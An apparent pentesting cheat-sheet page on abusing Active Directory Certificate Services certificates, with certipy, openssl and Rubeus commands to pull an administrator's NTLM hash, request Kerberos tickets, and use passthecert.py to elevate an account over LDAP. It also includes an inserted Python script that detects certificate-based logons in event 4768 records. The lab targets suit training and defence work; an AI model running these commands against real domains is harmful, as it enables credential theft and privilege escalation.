Certificate Authentication

Authentication

Certificates issued by Active Directory Certificate Services (ADCS) may have a variety of intended uses, called Extended Key Usages (EKUs). Certain certificate templates include the Client Authentication EKU, which Active Directory accepts as a credential. Valid certificates with this EKU can be used to authenticate to WinRM, LDAP, or other protocols, with varying effects.

Retrieving NTLM

Many issued certs can be used to retrieve the NTLM hash of a user account.

certipy auth -pfx administrator.pfx -username administrator -domain lab.local -dc-ip 10.129.205.199

Importing PEM/PFX

PEM and PFX certificate files can be imported into logon sessions with Rubeus.

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
cat cert.pfx | base64 -w 0
Rubeus.exe asktgt /user:user /certificate:MIIM7w[...]ECAggA /password:pass123 /nowrap
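
A defender-side check for the certificate-based TGT requests that the certipy and Rubeus commands above produce, added here as an example and not part of the original page or of any tool it mentions. It scans Security event 4768 records for pre-authentication types 15 and 16 (PKINIT) and reports accounts outside an allowlist; the event records, account names, and the expected_users allowlist are constructed assumptions.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
PKINIT_PREAUTH = {"15", "16"}  # PA-PK-AS-REP_OLD, PA-PK-AS-REQ (certificate pre-auth)

def event_xml(user, preauth, ip, issuer="", thumb=""):
    """Build a constructed, trimmed Security event 4768 record for the demo."""
    fields = {"TargetUserName": user, "PreAuthType": preauth, "IpAddress": ip,
              "Status": "0x0", "CertIssuerName": issuer, "CertThumbprint": thumb}
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>4768</EventID></System>'
            f'<EventData>{data}</EventData></Event>')

# Constructed sample records, not captured from a real domain controller.
SAMPLE_EVENTS = [
    event_xml("alice", "2", "::ffff:10.0.0.21"),                          # password pre-auth
    event_xml("bob", "16", "::ffff:10.0.0.22", "lab-CA", "AA11"),         # expected smart card user
    event_xml("administrator", "16", "::ffff:10.0.0.99", "lab-CA", "BB22"),
]

def parse_4768(xml_text):
    """Return the EventData fields of a 4768 event as a dict, or None for other events."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4768":
        return None
    return {d.get("Name"): (d.text or "") for d in root.iterfind("e:EventData/e:Data", NS)}

def flag_certificate_logons(events, expected_users):
    """List successful certificate-based TGT requests by accounts not expected to use them."""
    findings = []
    for xml_text in events:
        ev = parse_4768(xml_text)
        if ev is None or ev.get("Status") != "0x0":
            continue  # not a TGT request, or the request failed
        if ev.get("PreAuthType") not in PKINIT_PREAUTH:
            continue  # password or other non-certificate pre-authentication
        user = ev.get("TargetUserName", "").lower()
        if user not in expected_users:
            findings.append((user, ev.get("IpAddress"), ev.get("CertThumbprint")))
    return findings

if __name__ == "__main__":
    # expected_users is a hypothetical allowlist of accounts that normally use smart cards.
    for user, ip, thumb in flag_certificate_logons(SAMPLE_EVENTS, {"bob"}):
        print(f"unexpected PKINIT logon: {user} from {ip} cert={thumb}")
```

The thumbprint in each finding can be matched against the CA's issued-certificate records to identify the template and requester.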

PKINIT Authentication Disabled

If you attempt to authenticate via certificate and receive a PA_DATA_TYPE_NOT_SUPPORTED error, it means that the domain controller does not support the authentication EKU supplied in your certificate. However, you may still be able to use the certificate to initiate an authenticated LDAP session and perform actions on behalf of the certificate's principal.

openssl pkcs12 -in administrator.pfx -nocerts -out administrator.key
openssl pkcs12 -in administrator.pfx -clcerts -nokeys -out administrator.crt
openssl rsa -in administrator.key -out administrator-nopass.key
python3 passthecert.py -dc-ip 10.129.229.56 -crt administrator.crt -key administrator-nopass.key -domain authority.htb -port 636 -action modify_user -target victim -elevate
